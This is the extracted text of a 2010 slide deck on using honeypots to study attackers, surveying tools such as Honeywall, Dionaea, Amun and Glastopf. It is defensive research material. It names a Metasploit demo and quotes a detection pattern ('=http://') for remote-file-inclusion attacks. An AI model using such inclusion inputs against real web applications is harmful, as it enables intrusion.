use honeypots to kye

Honeypots

Adel Karimi The Honeynet Project

Nov 14, 2010

USE

TO KNOW YOUR ENEMIES

Speaker

Adel Karimi

Member of The Honeynet Project (Iranian Chapter Lead)

Editor-in-chief of Snoop Security Ezine

M.S. Student @ Tehran Polytechnic

…

Agenda

• About The Honeynet Project

• Introduction to Honeypot

• High-Interaction Honeypots

• Low-Interaction Honeypots

• Client Honeypots

The Honeynet Project

• Founded in 1999, The Honeynet Project is an

international, non-profit research organization

dedicated to improving the security of the Internet at

no cost to the public.

• We accomplish this goal in the following three ways:

– Awareness - We raise awareness of the threats and

vulnerabilities that exist in the Internet today

– Information - For those who are already aware and

concerned, we provide details to better secure and defend

your resources

– Tools

~ 40 International Chapters

Iranian Honeynet Chapter

Honeynet Project Challenges

• Learn about threats, analyze attacks, and share

findnings..

//honeynet.org/challenges

• Past Challenges: – Challenge 6 - Analyzing Malicious Portable Destructive Files

– Challenge 5 - Log Mysteries

– Challenge 4 - VoIP

– Challenge 3 - banking troubles

– Challenge 2 - browsers under attack

– Challenge 1 - pcap attack trace

Honeypots

• Definition: A honeypot is a security

resource whose value lies in being probed,

attacked, or compromised.

- Lance Spitzner

• Has no production value, anything going to

or from a honeypot is likely a probe, attack

or compromise

Honeypots

• Uses of honeypots – Slowing down and following incoming attackers

– Catching and analyzing 0-days, malwares, botnets,

and so on

– Improving intrusion detection systems

• SurfIDS

• Nebula (An Intrusion Signature Generator)

“To learn the tools, tactics and motives involved in

computer and network attacks.”

SurfIDS

Features: • Distributed sensors, Central honeypot deployment, Central logging.

Honeypots

• Honeypot vs. IDS

• Honeynet:

– A network of [High-Interaction] honeypots

– Main requirements:

• Data Control

• Data Capture

• Data Analysis

• Data Collection

Types of Honeypots

• Production vs. Research honeypots:

– Production honeypots protect an organization,

while research honeypots are used to learn.

• Different Types:

– High-Interaction

• Real environment

– Low-Interaction

• Simulated resource(s)

• Physical vs. Virtual !?

High-Interaction Honeypots

• Honeywall For capturing, controlling and analyzing attacks

– It creates an architecture that allows you to deploy both LI

and HI honeypots, but is designed primarily for HI.

– Layer 2 bridging device (Based on CentOS 5)

– Tools:

• IPtables

• Snort_inline

• Snort

• Hflow

• P0f

• Argus

• Sebek

• Walleye

Honeywall

Walleye web interface


• SEBEK

– For “data capture”

– Hidden kernel module that captures all

activities


• Qebek (QEMU Sebek) – A QEMU based HI honeypot monitoring tool which

aims at improving the invisibility of monitoring the

attackers’ activities in HI honeypots.

– Two techniques: Virtual machine introspection (VMI)

and system view reconstruction (SVR).

– VMI enabled the IDS or other security system to monitor the

system events from outside the virtual machine, while SVR

allows the monitoring system to reconstruct meaningful high OS-

level information from the raw hardware-level information

generated by VMI

• Read the recently published KYT paper, “Qebek - Conceal the Monitoring” - The paper is available from http://honeynet.org/papers/KYT_qebek

https://honeynet.org/papers/KYT_qebek

Low-Interaction Honeypots

• Honeyd – Written by Niels Provos in 2002.

– Available at www.honeyd.org

Features:

• Simulates thousands of virtual hosts at the same time

• Configuration of arbitrary services via simple configuration file

• Simulates operating systems at TCP/IP stack level

• Tarpit

• Dynamic templates

• Subsystem virtualization:

– Run real UNIX applications under virtual Honeyd IP addresses


• Nepenthes

– Nepenthes is a versatile tool to collect

malware. It acts passively by emulating

known vulnerabilities and downloading

malware trying to exploit these vulnerabilities. (Excerpt from Nepenthes website)

– Nepenthes is outdated

• Do not use Nepenthes, use Dionaea instead.

• Read why: http://carnivore.it/2009/10/27/introducting_dionaea

• PHARM - is a client/server tool to manage, report and

analyze all your distributed nepenthes instances from

one interface.


• Mwcollect – mwcollectd is a versatile malware collection

daemon, uniting the best features of nepenthes and

honeytrap.


• Dionaea

– Nepenthes successor

– Dionaea intention is to trap malware exploiting vulnerabilities exposed by services offerd to a network.

• Features: – Static state machines to emulate vulnerable service

– Pattern matching to extract values from shellcode

– Download copies of the attacking worm

– Store on disc, or submit to a sandbox

Dionaea

• Features:

– Implement required parts of the SMB protocol

– Uses libemu (Beyond pattern matching)

– Less services, better emulation and better logging..


• Amun – A Python Honeypot

– Basically a nepenthes port to python

Amun

• A sample of collected attack data from Amun:

Amun

DEMO

//Using Metasploit to Launch an Attack against Amun (MS08-067)

Source: http://amunhoney.sourceforge.net


• A new approach..

• Glastopf – A dynamic, LI web-app honeypot

– A minimalistic web server written in Python

– Collects information about web application-based attacks like RFI, SQL injection, and LFI

– Glastopf scans the incoming request for strings like “=http://” or “=ftp://” Try to download and analyze the file and respond as close as possible to the attacker's expectations

– The attacker sends us for example a bot, shell or spreader

Client Honeypots

• What is a HoneyClient!?

• Drive-by Download Attacks

Source: http://www.honeynet.org/papers/mw Source: Canadian Honeynet Project

Other Types of Honeypots

• WiFi Honeypot

• VoIP Honeypot

– VoIP Honey

– Artemisa

• SSH Honeypot

– Kippo

– Kojoney

• …

Conclusion

• You can use Honeypots to know your

enemies..!

– Collecting Malwares

– Tracking Botnets

– …

Virtual Honeypots: From Botnet

Tracking to Intrusion Detection

By Niels Provos, Thorsten Holz

Use Honeypots to Know Your Enemies

By Adel Karimi Iranian Honeynet Chapter adel.net at Gmail.com

Thank You..

?

use honeypots to kye

Documents